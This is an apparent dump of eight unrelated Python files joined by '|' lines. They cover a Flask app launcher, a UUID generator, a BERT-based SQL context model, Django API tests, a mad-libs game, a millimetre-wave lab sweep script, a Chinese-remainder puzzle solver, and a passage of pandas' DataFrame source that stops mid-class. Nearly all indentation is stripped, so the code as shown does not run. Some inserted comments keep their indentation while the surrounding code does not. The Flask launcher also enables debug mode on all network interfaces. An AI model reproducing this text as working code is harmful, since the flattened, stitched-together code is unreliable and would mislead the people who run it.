#! python3
# -*- encoding: utf-8 -*-
'''
Current module: rman.manager
Rough version history:
v1.0 Initial version
********************************************************************
@AUTHOR: Administrator-Bruce Luo(罗科峰)
MAIL: luokefeng@163.com
RCS: rman.manager, v1.0 2018-11-22
FROM: 2018-11-22
********************************************************************
======================================================================
Provides functions for the automation test.
'''
from rman.app import create_app, celery, db
from flask_migrate import Migrate
APP = create_app()
migrate = Migrate(APP, db)
celery.set_path()
if __name__ == "__main__":
APP.run(host='0.0.0.0', port=5000, debug=True)
|
#!/usr/bin/python3
# This library allows us to generate UUID values.
import uuid
howmany = int(input("How many UUIDs should be generated? "))
print("Generating UUIDs...")
# range() is required because an int itself is not iterable
for rando in range(howmany):
print( uuid.uuid4() )
|
import torch
import torch.nn as nn
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.configuration_bert import BertConfig
from transformers.modeling_bert import BertLayerNorm, BertPreTrainedModel, gelu, BertModel
COLUMN_SQL_LABEL_COUNT = 502
SQL_DIFF_LABEL_COUNT = 120
class BertForContext(BertPreTrainedModel):
config_class = BertConfig
base_model_prefix = "bert"
def __init__(self, config):
super().__init__(config)
self.bert = BertModel(config)
self.lm_head = BertContextHead(config)
self.q_tab_dense = nn.Linear(config.hidden_size*2, config.hidden_size)
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
masked_lm_labels=None,
masked_col_labels=None,
masked_context_labels=None,
q_tab_inds=None,
is_train=True
):
outputs = self.bert(input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask)
sequence_output = outputs[0]
if q_tab_inds is not None:
q_tab_inds = q_tab_inds.unsqueeze(2).expand_as(sequence_output)
q_tab_output = torch.gather(sequence_output, 1, q_tab_inds)
sequence_output = self.q_tab_dense(torch.cat([sequence_output, q_tab_output], 2))
lm_prediction_scores, col_prediction_scores, context_prediction_scores = self.lm_head(sequence_output)
total_loss = None
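        # NOTE: the branches below blend the column-label loss and the masked-LM
        # loss (weighted 0.8 / 0.2) when both label sets are provided; otherwise
        # whichever single loss is available becomes the total loss.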
if masked_col_labels is not None:
# TODO: weights for labels
weight_list = [0.3] + [1.]*(COLUMN_SQL_LABEL_COUNT-1)
weights = torch.tensor(weight_list).cuda()
weighted_loss_fct = CrossEntropyLoss(weight=weights, ignore_index=-1)
masked_col_loss = weighted_loss_fct(col_prediction_scores.view(-1, COLUMN_SQL_LABEL_COUNT), masked_col_labels.view(-1))
if masked_lm_labels is not None:
loss_fct = CrossEntropyLoss(ignore_index=-1)
masked_lm_loss = loss_fct(lm_prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
if masked_col_labels is not None and masked_lm_labels is not None:
total_loss = 0.8 * masked_col_loss + 0.2 * masked_lm_loss
elif masked_col_labels is not None:
total_loss = masked_col_loss
elif masked_lm_labels is not None:
total_loss = masked_lm_loss
if is_train:
return total_loss
else:
return total_loss, (lm_prediction_scores, col_prediction_scores, context_prediction_scores)
# return outputs # (masked_lm_loss), prediction_scores, (hidden_states), (attentions)
class BertContextHead(nn.Module):
"""Bert Head for masked language modeling."""
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.layer_norm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
self.dense_col = nn.Linear(config.hidden_size, config.hidden_size)
self.layer_norm_col = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.decoder_col = nn.Linear(config.hidden_size, COLUMN_SQL_LABEL_COUNT, bias=False)
self.bias_col = nn.Parameter(torch.zeros(COLUMN_SQL_LABEL_COUNT))
self.dense_context = nn.Linear(config.hidden_size, config.hidden_size)
self.layer_norm_context = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.decoder_context = nn.Linear(config.hidden_size, SQL_DIFF_LABEL_COUNT, bias=False)
self.bias_context = nn.Parameter(torch.zeros(SQL_DIFF_LABEL_COUNT))
def forward(self, features, **kwargs):
lm_prediction_scores = self.dense(features)
lm_prediction_scores = gelu(lm_prediction_scores)
lm_prediction_scores = self.layer_norm(lm_prediction_scores)
# project back to size of vocabulary with bias
lm_prediction_scores = self.decoder(lm_prediction_scores) + self.bias
col_prediction_scores = self.dense_col(features)
col_prediction_scores = gelu(col_prediction_scores)
col_prediction_scores = self.layer_norm_col(col_prediction_scores)
# project back to size of possible column labels
col_prediction_scores = self.decoder_col(col_prediction_scores) + self.bias_col
context_prediction_scores = self.dense_context(features)
context_prediction_scores = gelu(context_prediction_scores)
context_prediction_scores = self.layer_norm_context(context_prediction_scores)
# project back to size of possible sql diff labels
context_prediction_scores = self.decoder_context(context_prediction_scores) + self.bias_context
return lm_prediction_scores, col_prediction_scores, context_prediction_scores
|
"""(c) All rights reserved. ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE, Switzerland, VPSI, 2017"""
import json
import re
from time import sleep
from django.test import tag
from django.urls import reverse
from rest_framework.test import APITestCase
from api import rancher
from api.redis import flush_all
from api.tests import KERMIT_SCIPER, KERMIT_UNIT
from config.settings.base import get_config
class ViewsTestCase(APITestCase):
def setUp(self):
flush_all()
def tearDown(self):
flush_all()
def test_get_unit_list(self):
response = self.client.get(
reverse('unit-list'),
data={},
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "Units not found")
def test_get_user_list(self):
response = self.client.get(
reverse('user-list'),
data={},
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "Users not found")
def test_get_user_detail(self):
response = self.client.get(
            reverse(viewname='user-detail', kwargs={'user_id': "133134"}),
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "User not found")
def test_get_unit_detail(self):
response = self.client.get(
            reverse(viewname='unit-detail', kwargs={'unit_id': KERMIT_UNIT}),
format='json'
)
self.assertEqual(response.status_code, 404)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(content, "Unit not found")
def test_post_apikeys(self):
"""
Test the POST method of KeyView
"""
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
self.assertEqual(response.status_code, 200)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(len(content["access_key"]), 20)
self.assertEqual(len(content["secret_key"]), 40)
self.assertEqual(
response['content-type'],
'application/json'
)
def test_get_apikeys(self):
""" Test the GET method of KeyView """
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
response = self.client.get(
reverse('apikey-list'),
data={"access_key": content["access_key"],
"secret_key": content["secret_key"]},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(len(content), 1)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
@tag('rancher')
def test_reset_password(self):
# create an APIKey
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
access_key = content["access_key"]
secret_key = content["secret_key"]
# create a schema
response = self.client.post(
reverse('schema-list'),
data={"access_key": access_key,
"secret_key": secret_key},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
sleep(10)
# reset the password
response = self.client.post(
reverse(
viewname='schema-detail-password',
args={content["schema_id"]},
),
data={"access_key": access_key, "secret_key": secret_key},
format='json'
)
self.assertEqual(response.status_code, 200)
@tag('rancher')
def test_post_schemas(self):
""" Test the POST method of Schemas """
# create API Keys
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
access_key = content["access_key"]
secret_key = content["secret_key"]
# create a schema
response = self.client.post(
reverse('schema-list'),
data={"access_key": access_key,
"secret_key": secret_key},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
        self.assertIsNotNone(re.match(r'^mysql://\w+:[-\+\w]+@[-\.\w]+:\d+/.+$', content['connection_string']))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
# Get schema
response = self.client.get(
reverse(
viewname='schema-detail',
args={content["schema_id"]},
),
data={"access_key": access_key, "secret_key": secret_key},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
        self.assertIsNotNone(re.match(r'^mysql://\w+@[-\.\w]+:\d+/.+$', content['connection_string']))
sleep(10)
# Patch schema
response = self.client.patch(
reverse(
viewname='schema-detail',
args={content["schema_id"]},
),
data={"access_key": access_key, "secret_key": secret_key, "unit_id": "13029"},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
self.assertEqual(content["unit_id"], "13029")
        # Clean stacks
conn = rancher.Rancher()
conn.clean_stacks(KERMIT_SCIPER)
@tag('rancher')
def test_get_schemas(self):
""" Test the GET method of schemas"""
# create an API key
response = self.client.post(
reverse('apikey-list'),
data={"username": get_config('TEST_USERNAME'), "password": get_config('TEST_CORRECT_PWD')},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
self.client.post(
reverse('schema-list'),
data={"access_key": content["access_key"],
"secret_key": content["secret_key"]},
format='json'
)
response = self.client.get(
reverse('schema-list'),
data={"access_key": content["access_key"],
"secret_key": content["secret_key"]},
format='json'
)
content = json.loads(response.content.decode('utf-8'))
# we get a list of dicts with 1 element
self.assertEqual(len(content), 1)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response['content-type'],
'application/json'
)
# Clean stacks
conn = rancher.Rancher()
conn.clean_stacks(KERMIT_SCIPER)
def test_get_version(self):
""" Test the GET method of Version """
response = self.client.get(
reverse('version-detail'),
format='json'
)
content = json.loads(response.content.decode('utf-8'))
        self.assertIsNotNone(re.match(r'^\d+\.\d+\.\d+$', content))
|
# Mad Libs Generator - Sagar Kargathra 10/07/2020
"""
mad-libs-project.py
Interactive display of a mad lib, which is provided as a Python format string,
with all the cues being dictionary formats, in the form {cue}.
In this version, the cues are extracted from the story automatically,
and the user is prompted for the replacements.
Original version adapted from code by Kirby Urner
"""
def getKeys(formatString):
'''formatString is a format string with embedded dictionary keys.
Return a set containing all the keys from the format string.'''
keyList = list()
end = 0
repetitions = formatString.count('{')
for i in range(repetitions):
start = formatString.find('{', end) + 1 # pass the '{'
end = formatString.find('}', start)
key = formatString[start : end]
keyList.append(key) # may add duplicates
return set(keyList) # removes duplicates: no duplicates in a set
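# Aside (added for illustration; not part of the original madlib code): the
# standard library can extract the cue names as well. A minimal sketch using
# string.Formatter, assuming the cues never use attribute or index access
# inside the braces:
import string
def getKeysWithFormatter(formatString):
    '''Alternative cue extraction using string.Formatter().parse.'''
    return {field for _, field, _, _ in string.Formatter().parse(formatString)
            if field is not None}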
def addPick(cue, dictionary): # from madlib.py
'''Prompt for a user response using the cue string,
and place the cue-response pair in the dictionary.
'''
promptFormat = "Enter a specific example for {name}: "
prompt = promptFormat.format(name=cue)
response = input(prompt)
dictionary[cue] = response
def getUserPicks(cues):
'''Loop through the collection of cue keys and get user choices.
Return the resulting dictionary.
'''
userPicks = dict()
for cue in cues:
addPick(cue, userPicks)
return userPicks
def tellStory(storyFormat):
'''storyFormat is a string with Python dictionary references embedded,
in the form {cue}. Prompt the user for the mad lib substitutions
and then print the resulting story with the substitutions.
'''
cues = getKeys(storyFormat)
userPicks = getUserPicks(cues)
story = storyFormat.format(**userPicks)
print(story)
def main():
originalStoryFormat = '''
Once upon a time, deep in an ancient jungle,
there lived a {animal}. This {animal}
liked to eat {food}, but the jungle had
very little {food} to offer. One day, an
explorer found the {animal} and discovered
it liked {food}. The explorer took the
{animal} back to {city}, where it could
eat as much {food} as it wanted. However,
the {animal} became homesick, so the
explorer brought it back to the jungle,
leaving a large supply of {food}.
The End
'''
tellStory(originalStoryFormat)
input("Press Enter to end the program.")
main()
|
from kid_readout.interactive import *
import time
import logging
import numpy as np
from equipment.custom import mmwave_source
from equipment.hittite import signal_generator
from equipment.srs import lockin
from xystage import stepper
from kid_readout.equipment import hardware
from kid_readout.measurement import mmw_source_sweep, core, acquire
logger.setLevel(logging.DEBUG)
lockin = lockin.Lockin(LOCKIN_SERIAL_PORT)
tic = time.time()
# lockin.sensitivity = 17
print lockin.identification
print lockin.identification
source = mmwave_source.MMWaveSource()
source.set_attenuator_turns(6.0,6.0)
source.multiplier_input = 'thermal'
source.waveguide_twist_angle = 0
source.ttl_modulation_source = 'roach'
hwp_motor = stepper.SimpleStepper(port='/dev/ttyACM2')
setup = hardware.Hardware(hwp_motor, source, lockin)
ri = Roach2Baseband()
ri.set_modulation_output('low')
#setup = hardware.Hardware()
ri = Roach2Baseband()
#turn on source
ri.set_modulation_output(7)
raw_input('set attenuator knobs to 3 turns & check lock-in range')
for dac_atten in [10]:
ri.set_dac_atten(dac_atten)
df = acquire.new_nc_file(suffix='vna_dac_atten_%.1f_dB_1_turns_chopped' % dac_atten)
swa = acquire.run_sweep(ri,np.linspace(100,180,64)[None,:]+np.arange(650,dtype='int')[:,None]*512./2.**18,
2**18,
verbose=True,length_seconds=.1,
)
df.write(swa)
df.close()
#for example
#170-230 MHz band, steps are (230-170)/128
#then sampling 480 times between each of these steps by stepping an additional 2**18
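# Illustrative aside (added; not part of the original acquisition script): the
# sweep-frequency argument passed to acquire.run_sweep above is a broadcasted
# 2-D grid with one row per coarse 512/2**18 step and one column per fine
# offset. A minimal sketch of that construction (np is numpy, imported above):
example_base = np.linspace(100, 180, 64)[None, :]                     # shape (1, 64)
example_step = np.arange(650, dtype='int')[:, None] * 512. / 2.**18   # shape (650, 1)
example_freqs = example_base + example_step                           # shape (650, 64)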
|
#!/usr/bin/env python3
import functools
def chinese_remainder_theorem(pairs):
n = functools.reduce(lambda a, b: a * b, [pair[0] for pair in pairs])
x = 0
for pair in pairs:
bi = pair[1]
        ni = n // pair[0]  # integer division keeps full precision for large moduli
num = ni % pair[0]
xi = 1
while (xi * num) % pair[0] != 1:
xi += 1
x += bi * ni * xi
return n, x % n
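# Illustrative sanity check (added; not part of the original puzzle solution):
# the classic example x ≡ 2 (mod 3), x ≡ 3 (mod 5), x ≡ 2 (mod 7) has the
# unique solution 23 modulo 105.
assert chinese_remainder_theorem([(3, 2), (5, 3), (7, 2)]) == (105, 23)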
with open("./data/data1") as file:
file_data = file.readlines()
bus_ids = file_data[1][:-1].split(',')
bus_and_minutes = []
for index, bus_id in enumerate(bus_ids):
if bus_id != 'x':
bus_and_minutes.append((int(bus_id), index))
result = chinese_remainder_theorem(bus_and_minutes)
print(result[0] - result[1])
|
"""
DataFrame
---------
An efficient 2D container for potentially mixed-type time series or other
labeled data series.
Similar to its R counterpart, data.frame, except providing automatic data
alignment and a host of useful data manipulation methods having to do with the
labeling information
"""
from __future__ import annotations
import collections
from collections import abc
import datetime
from io import StringIO
import itertools
from textwrap import dedent
from typing import (
IO,
TYPE_CHECKING,
Any,
AnyStr,
Dict,
FrozenSet,
Hashable,
Iterable,
Iterator,
List,
Optional,
Sequence,
Set,
Tuple,
Type,
Union,
cast,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._config import get_option
from pandas._libs import algos as libalgos, lib, properties
from pandas._libs.lib import no_default
from pandas._typing import (
AggFuncType,
ArrayLike,
Axes,
Axis,
CompressionOptions,
Dtype,
FilePathOrBuffer,
FrameOrSeriesUnion,
IndexKeyFunc,
Label,
Level,
Renamer,
StorageOptions,
ValueKeyFunc,
)
from pandas.compat._optional import import_optional_dependency
from pandas.compat.numpy import function as nv
from pandas.util._decorators import (
Appender,
Substitution,
deprecate_kwarg,
doc,
rewrite_axis_style_signature,
)
from pandas.util._validators import (
validate_axis_style_args,
validate_bool_kwarg,
validate_percentile,
)
from pandas.core.dtypes.cast import (
cast_scalar_to_array,
coerce_to_dtypes,
construct_1d_arraylike_from_scalar,
find_common_type,
infer_dtype_from_scalar,
invalidate_string_dtypes,
maybe_cast_to_datetime,
maybe_casted_values,
maybe_convert_platform,
maybe_downcast_to_dtype,
maybe_infer_to_datetimelike,
maybe_upcast,
validate_numeric_casting,
)
from pandas.core.dtypes.common import (
ensure_int64,
ensure_platform_int,
infer_dtype_from_object,
is_bool_dtype,
is_dataclass,
is_datetime64_any_dtype,
is_dict_like,
is_dtype_equal,
is_extension_array_dtype,
is_float,
is_float_dtype,
is_hashable,
is_integer,
is_integer_dtype,
is_iterator,
is_list_like,
is_named_tuple,
is_object_dtype,
is_scalar,
is_sequence,
needs_i8_conversion,
pandas_dtype,
)
from pandas.core.dtypes.missing import isna, notna
from pandas.core import algorithms, common as com, nanops, ops
from pandas.core.accessor import CachedAccessor
from pandas.core.aggregation import (
aggregate,
reconstruct_func,
relabel_result,
transform,
)
from pandas.core.arrays import Categorical, ExtensionArray
from pandas.core.arrays.sparse import SparseFrameAccessor
from pandas.core.construction import extract_array
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.indexes import base as ibase
from pandas.core.indexes.api import Index, ensure_index, ensure_index_from_sequences
from pandas.core.indexes.multi import MultiIndex, maybe_droplevels
from pandas.core.indexing import check_bool_indexer, convert_to_index_sliceable
from pandas.core.internals import BlockManager
from pandas.core.internals.construction import (
arrays_to_mgr,
dataclasses_to_dicts,
get_names_from_index,
init_dict,
init_ndarray,
masked_rec_array_to_mgr,
reorder_arrays,
sanitize_index,
to_arrays,
)
from pandas.core.reshape.melt import melt
from pandas.core.series import Series
from pandas.io.common import get_filepath_or_buffer
from pandas.io.formats import console, format as fmt
from pandas.io.formats.info import DataFrameInfo
import pandas.plotting
if TYPE_CHECKING:
from pandas.core.groupby.generic import DataFrameGroupBy
from pandas.io.formats.style import Styler
# ---------------------------------------------------------------------
# Docstring templates
_shared_doc_kwargs = dict(
axes="index, columns",
klass="DataFrame",
axes_single_arg="{0 or 'index', 1 or 'columns'}",
axis="""axis : {0 or 'index', 1 or 'columns'}, default 0
If 0 or 'index': apply function to each column.
If 1 or 'columns': apply function to each row.""",
optional_by="""
by : str or list of str
Name or list of names to sort by.
- if `axis` is 0 or `'index'` then `by` may contain index
levels and/or column labels.
- if `axis` is 1 or `'columns'` then `by` may contain column
levels and/or index labels.""",
optional_labels="""labels : array-like, optional
New labels / index to conform the axis specified by 'axis' to.""",
optional_axis="""axis : int or str, optional
Axis to target. Can be either the axis name ('index', 'columns')
or number (0, 1).""",
)
_numeric_only_doc = """numeric_only : boolean, default None
Include only float, int, boolean data. If None, will attempt to use
everything, then use only numeric data
"""
_merge_doc = """
Merge DataFrame or named Series objects with a database-style join.
The join is done on columns or indexes. If joining columns on
columns, the DataFrame indexes *will be ignored*. Otherwise if joining indexes
on indexes or indexes on a column or columns, the index will be passed on.
Parameters
----------%s
right : DataFrame or named Series
Object to merge with.
how : {'left', 'right', 'outer', 'inner'}, default 'inner'
Type of merge to be performed.
* left: use only keys from left frame, similar to a SQL left outer join;
preserve key order.
* right: use only keys from right frame, similar to a SQL right outer join;
preserve key order.
* outer: use union of keys from both frames, similar to a SQL full outer
join; sort keys lexicographically.
* inner: use intersection of keys from both frames, similar to a SQL inner
join; preserve the order of the left keys.
on : label or list
Column or index level names to join on. These must be found in both
DataFrames. If `on` is None and not merging on indexes then this defaults
to the intersection of the columns in both DataFrames.
left_on : label or list, or array-like
Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on : label or list, or array-like
Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index : bool, default False
Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index
or a number of columns) must match the number of levels.
right_index : bool, default False
Use the index from the right DataFrame as the join key. Same caveats as
left_index.
sort : bool, default False
Sort the join keys lexicographically in the result DataFrame. If False,
the order of the join keys depends on the join type (how keyword).
suffixes : list-like, default is ("_x", "_y")
A length-2 sequence where each element is optionally a string
indicating the suffix to add to overlapping column names in
`left` and `right` respectively. Pass a value of `None` instead
of a string to indicate that the column name from `left` or
`right` should be left as-is, with no suffix. At least one of the
values must not be None.
copy : bool, default True
If False, avoid copy if possible.
indicator : bool or str, default False
If True, adds a column to the output DataFrame called "_merge" with
information on the source of each row. The column can be given a different
name by providing a string argument. The column will have a Categorical
type with the value of "left_only" for observations whose merge key only
appears in the left DataFrame, "right_only" for observations
whose merge key only appears in the right DataFrame, and "both"
if the observation's merge key is found in both DataFrames.
validate : str, optional
If specified, checks if merge is of specified type.
* "one_to_one" or "1:1": check if merge keys are unique in both
left and right datasets.
* "one_to_many" or "1:m": check if merge keys are unique in left
dataset.
* "many_to_one" or "m:1": check if merge keys are unique in right
dataset.
* "many_to_many" or "m:m": allowed, but does not result in checks.
Returns
-------
DataFrame
A DataFrame of the two merged objects.
See Also
--------
merge_ordered : Merge with optional filling/interpolation.
merge_asof : Merge on nearest keys.
DataFrame.join : Similar method using indices.
Notes
-----
Support for specifying index levels as the `on`, `left_on`, and
`right_on` parameters was added in version 0.23.0
Support for merging named Series objects was added in version 0.24.0
Examples
--------
>>> df1 = pd.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [1, 2, 3, 5]})
>>> df2 = pd.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [5, 6, 7, 8]})
>>> df1
lkey value
0 foo 1
1 bar 2
2 baz 3
3 foo 5
>>> df2
rkey value
0 foo 5
1 bar 6
2 baz 7
3 foo 8
Merge df1 and df2 on the lkey and rkey columns. The value columns have
the default suffixes, _x and _y, appended.
>>> df1.merge(df2, left_on='lkey', right_on='rkey')
lkey value_x rkey value_y
0 foo 1 foo 5
1 foo 1 foo 8
2 foo 5 foo 5
3 foo 5 foo 8
4 bar 2 bar 6
5 baz 3 baz 7
Merge DataFrames df1 and df2 with specified left and right suffixes
appended to any overlapping columns.
>>> df1.merge(df2, left_on='lkey', right_on='rkey',
... suffixes=('_left', '_right'))
lkey value_left rkey value_right
0 foo 1 foo 5
1 foo 1 foo 8
2 foo 5 foo 5
3 foo 5 foo 8
4 bar 2 bar 6
5 baz 3 baz 7
Merge DataFrames df1 and df2, but raise an exception if the DataFrames have
any overlapping columns.
>>> df1.merge(df2, left_on='lkey', right_on='rkey', suffixes=(False, False))
Traceback (most recent call last):
...
ValueError: columns overlap but no suffix specified:
Index(['value'], dtype='object')
"""
# -----------------------------------------------------------------------
# DataFrame class
class DataFrame(NDFrame):
"""
Two-dimensional, size-mutable, potentially heterogeneous tabular data.
Data structure also contains labeled axes (rows and columns).
Arithmetic operations align on both row and column labels. Can be
thought of as a dict-like container for Series objects. The primary
pandas data structure.
Parameters
----------
data : ndarray (structured or homogeneous), Iterable, dict, or DataFrame
Dict can contain Series, arrays, constants, or list-like objects. If
data is a dict, column order follows insertion-order.
.. versionchanged:: 0.25.0
If data is a list of dicts, column order follows insertion-order.
index : Index or array-like
Index to use for resulting frame. Will default to RangeIndex if
no indexing information part of input data and no index provided.
columns : Index or array-like
Column labels to use for resulting frame. Will default to
RangeIndex (0, 1, 2, ..., n) if no column labels are provided.
dtype : dtype, default None
Data type to force. Only a single dtype is allowed. If None, infer.
copy : bool, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input.
See Also
--------
DataFrame.from_records : Constructor from tuples, also record arrays.
DataFrame.from_dict : From dicts of Series, arrays, or dicts.
read_csv : Read a comma-separated values (csv) file into DataFrame.
read_table : Read general delimited file into DataFrame.
read_clipboard : Read text from clipboard into DataFrame.
Examples
--------
Constructing DataFrame from a dictionary.
>>> d = {'col1': [1, 2], 'col2': [3, 4]}
>>> df = pd.DataFrame(data=d)
>>> df
col1 col2
0 1 3
1 2 4
Notice that the inferred dtype is int64.
>>> df.dtypes
col1 int64
col2 int64
dtype: object
To enforce a single dtype:
>>> df = pd.DataFrame(data=d, dtype=np.int8)
>>> df.dtypes
col1 int8
col2 int8
dtype: object
Constructing DataFrame from numpy ndarray:
>>> df2 = pd.DataFrame(np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]),
... columns=['a', 'b', 'c'])
>>> df2
a b c
0 1 2 3
1 4 5 6
2 7 8 9
"""
_internal_names_set = {"columns", "index"} | NDFrame._internal_names_set
_typ = "dataframe"
@property
def _constructor(self) -> Type[DataFrame]:
return DataFrame
_constructor_sliced: Type[Series] = Series
_deprecations: FrozenSet[str] = NDFrame._deprecations | frozenset([])
_accessors: Set[str] = {"sparse"}
@property
def _constructor_expanddim(self):
# GH#31549 raising NotImplementedError on a property causes trouble
# for `inspect`
def constructor(*args, **kwargs):
raise NotImplementedError("Not supported for DataFrames!")
return constructor
# ----------------------------------------------------------------------
# Constructors
def __init__(
self,
data=None,
index: Optional[Axes] = None,
columns: Optional[Axes] = None,
dtype: Optional[Dtype] = None,
copy: bool = False,
):
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
if isinstance(data, DataFrame):
data = data._mgr
if isinstance(data, BlockManager):
if index is None and columns is None and dtype is None and copy is False:
# GH#33357 fastpath
NDFrame.__init__(self, data)
return
mgr = self._init_mgr(
data, axes=dict(index=index, columns=columns), dtype=dtype, copy=copy
)
elif isinstance(data, dict):
mgr = init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, ma.MaskedArray):
import numpy.ma.mrecords as mrecords
# masked recarray
if isinstance(data, mrecords.MaskedRecords):
mgr = masked_rec_array_to_mgr(data, index, columns, dtype, copy)
# a masked array
else:
mask = ma.getmaskarray(data)
if mask.any():
data, fill_value = maybe_upcast(data, copy=True)
data.soften_mask() # set hardmask False if it was True
data[mask] = fill_value
else:
data = data.copy()
mgr = init_ndarray(data, index, columns, dtype=dtype, copy=copy)
elif isinstance(data, (np.ndarray, Series, Index)):
if data.dtype.names:
data_columns = list(data.dtype.names)
data = {k: data[k] for k in data_columns}
if columns is None:
columns = data_columns
mgr = init_dict(data, index, columns, dtype=dtype)
elif getattr(data, "name", None) is not None:
mgr = init_dict({data.name: data}, index, columns, dtype=dtype)
else:
mgr = init_ndarray(data, index, columns, dtype=dtype, copy=copy)
# For data is list-like, or Iterable (will consume into list)
elif isinstance(data, abc.Iterable) and not isinstance(data, (str, bytes)):
if not isinstance(data, (abc.Sequence, ExtensionArray)):
data = list(data)
if len(data) > 0:
if is_dataclass(data[0]):
data = dataclasses_to_dicts(data)
if is_list_like(data[0]) and getattr(data[0], "ndim", 1) == 1:
if is_named_tuple(data[0]) and columns is None:
columns = data[0]._fields
arrays, columns = to_arrays(data, columns, dtype=dtype)
columns = ensure_index(columns)
# set the index
if index is None:
if isinstance(data[0], Series):
index = get_names_from_index(data)
elif isinstance(data[0], Categorical):
index = ibase.default_index(len(data[0]))
else:
index = ibase.default_index(len(data))
mgr = arrays_to_mgr(arrays, columns, index, columns, dtype=dtype)
else:
mgr = init_ndarray(data, index, columns, dtype=dtype, copy=copy)
else:
mgr = init_dict({}, index, columns, dtype=dtype)
# For data is scalar
else:
if index is None or columns is None:
raise ValueError("DataFrame constructor not properly called!")
if not dtype:
dtype, _ = infer_dtype_from_scalar(data, pandas_dtype=True)
# For data is a scalar extension dtype
if is_extension_array_dtype(dtype):
values = [
construct_1d_arraylike_from_scalar(data, len(index), dtype)
for _ in range(len(columns))
]
mgr = arrays_to_mgr(values, columns, index, columns, dtype=None)
else:
# Attempt to coerce to a numpy array
try:
arr = np.array(data, dtype=dtype, copy=copy)
except (ValueError, TypeError) as err:
exc = TypeError(
"DataFrame constructor called with "
f"incompatible data and dtype: {err}"
)
raise exc from err
if arr.ndim != 0:
raise ValueError("DataFrame constructor not properly called!")
values = cast_scalar_to_array(
(len(index), len(columns)), data, dtype=dtype
)
mgr = init_ndarray(
values, index, columns, dtype=values.dtype, copy=False
)
NDFrame.__init__(self, mgr)
# ----------------------------------------------------------------------
@property
def axes(self) -> List[Index]:
"""
Return a list representing the axes of the DataFrame.
It has the row axis labels and column axis labels as the only members.
They are returned in that order.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.axes
[RangeIndex(start=0, stop=2, step=1), Index(['col1', 'col2'],
dtype='object')]
"""
return [self.index, self.columns]
@property
def shape(self) -> Tuple[int, int]:
"""
Return a tuple representing the dimensionality of the DataFrame.
See Also
--------
ndarray.shape
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.shape
(2, 2)
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4],
... 'col3': [5, 6]})
>>> df.shape
(2, 3)
"""
return len(self.index), len(self.columns)
@property
def _is_homogeneous_type(self) -> bool:
"""
Whether all the columns in a DataFrame have the same type.
Returns
-------
bool
See Also
--------
Index._is_homogeneous_type : Whether the object has a single
dtype.
MultiIndex._is_homogeneous_type : Whether all the levels of a
MultiIndex have the same dtype.
Examples
--------
>>> DataFrame({"A": [1, 2], "B": [3, 4]})._is_homogeneous_type
True
>>> DataFrame({"A": [1, 2], "B": [3.0, 4.0]})._is_homogeneous_type
False
Items with the same type but different sizes are considered
different types.
>>> DataFrame({
... "A": np.array([1, 2], dtype=np.int32),
... "B": np.array([1, 2], dtype=np.int64)})._is_homogeneous_type
False
"""
if self._mgr.any_extension_types:
return len({block.dtype for block in self._mgr.blocks}) == 1
else:
return not self._is_mixed_type
@property
